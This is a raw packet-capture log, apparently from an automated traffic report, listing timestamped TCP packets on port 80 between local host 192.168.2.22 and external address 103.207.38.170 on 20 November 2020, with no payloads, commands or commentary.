                                                                                                                                                      Nov 20, 2020 20:04:33.857147932 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857192039 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857207060 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857232094 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857270002 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857291937 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857309103 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857314110 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857316971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857423067 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857440948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857523918 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.859353065 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.071604967 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071662903 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071702003 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071742058 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071782112 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071783066 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.071820974 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071821928 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.071834087 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.071861029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071892977 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.071901083 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.071927071 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.071968079 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.077888012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.077961922 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078002930 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078042030 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078071117 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078080893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078104973 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078119993 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078126907 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078155994 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078169107 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078171968 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078212976 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078239918 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078249931 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078252077 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078289986 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078318119 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078329086 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078342915 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078367949 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078404903 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078408003 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078417063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078448057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078480959 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078499079 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078505993 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078543901 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078556061 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078584909 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078603029 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078624010 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078629971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078663111 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078681946 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078700066 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078701973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078741074 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078757048 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078778982 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078778982 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078828096 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078840971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078871965 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078887939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078911066 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078936100 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078949928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078958035 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078983068 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078989983 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079029083 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079041958 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079067945 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079099894 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079107046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079116106 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079154968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079190969 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079199076 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079207897 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079237938 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079252005 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079277039 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079293013 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079314947 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079339027 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079354048 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079359055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079394102 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079406023 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079437971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079443932 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079482079 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079510927 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079521894 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079550028 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079577923 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.080457926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290147066 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290184975 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290208101 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290234089 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290258884 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290277958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290294886 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290313959 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290324926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290334940 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290360928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290383101 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290386915 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290407896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290427923 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290431023 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290446997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290465117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290482044 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290482998 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290523052 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290559053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.292257071 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297674894 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297704935 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297724962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297741890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297760010 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297780991 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297800064 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297823906 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297831059 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297847986 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297864914 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297869921 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297889948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297898054 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297905922 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297923088 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297929049 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297943115 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297966003 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297987938 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298011065 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298011065 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298022032 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298027992 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298036098 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298054934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298073053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298077106 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298100948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298111916 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298124075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298146963 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298167944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298182011 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298190117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298191071 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298213005 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298224926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298235893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298249006 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298259020 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298281908 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298299074 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298316002 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298320055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298337936 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298360109 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298360109 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298372984 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298381090 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298382998 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298407078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298429966 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298441887 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298453093 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298456907 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298477888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298477888 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298496962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298516035 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298538923 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298542976 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298554897 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298557997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298562050 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298580885 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298604012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298604965 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298629045 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298641920 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298654079 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298671961 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298676968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298700094 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298721075 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298723936 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298728943 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298747063 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298769951 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298779011 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298790932 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298799992 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298815966 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298839092 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298841953 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298863888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298866034 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298890114 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298913002 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298933029 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298935890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298942089 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298959970 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298962116 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298978090 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298985958 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299001932 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299026012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299047947 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299048901 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299071074 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299086094 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299093962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299094915 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299117088 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299124956 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299139977 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299160957 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299163103 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299186945 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299190044 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299206972 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299226999 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299228907 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299252033 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299257040 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299273968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299297094 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299309015 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299320936 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299333096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299339056 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299357891 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299364090 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299376965 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299392939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299398899 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299421072 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.299428940 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299463034 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.299494028 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.301676035 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508526087 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508573055 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508598089 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508620977 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508641958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508675098 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508688927 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508708000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508723974 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508744955 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508769989 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508791924 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508795023 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508816957 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508824110 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508832932 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508841038 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508863926 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508882046 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508884907 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508908987 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508924961 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508933067 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508958101 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.508959055 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508985043 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.508989096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509006977 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509022951 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509031057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509052038 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509053946 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509074926 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509087086 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509097099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509111881 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.509119987 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.509145021 CET8049165103.207.38.170192.168.2.22
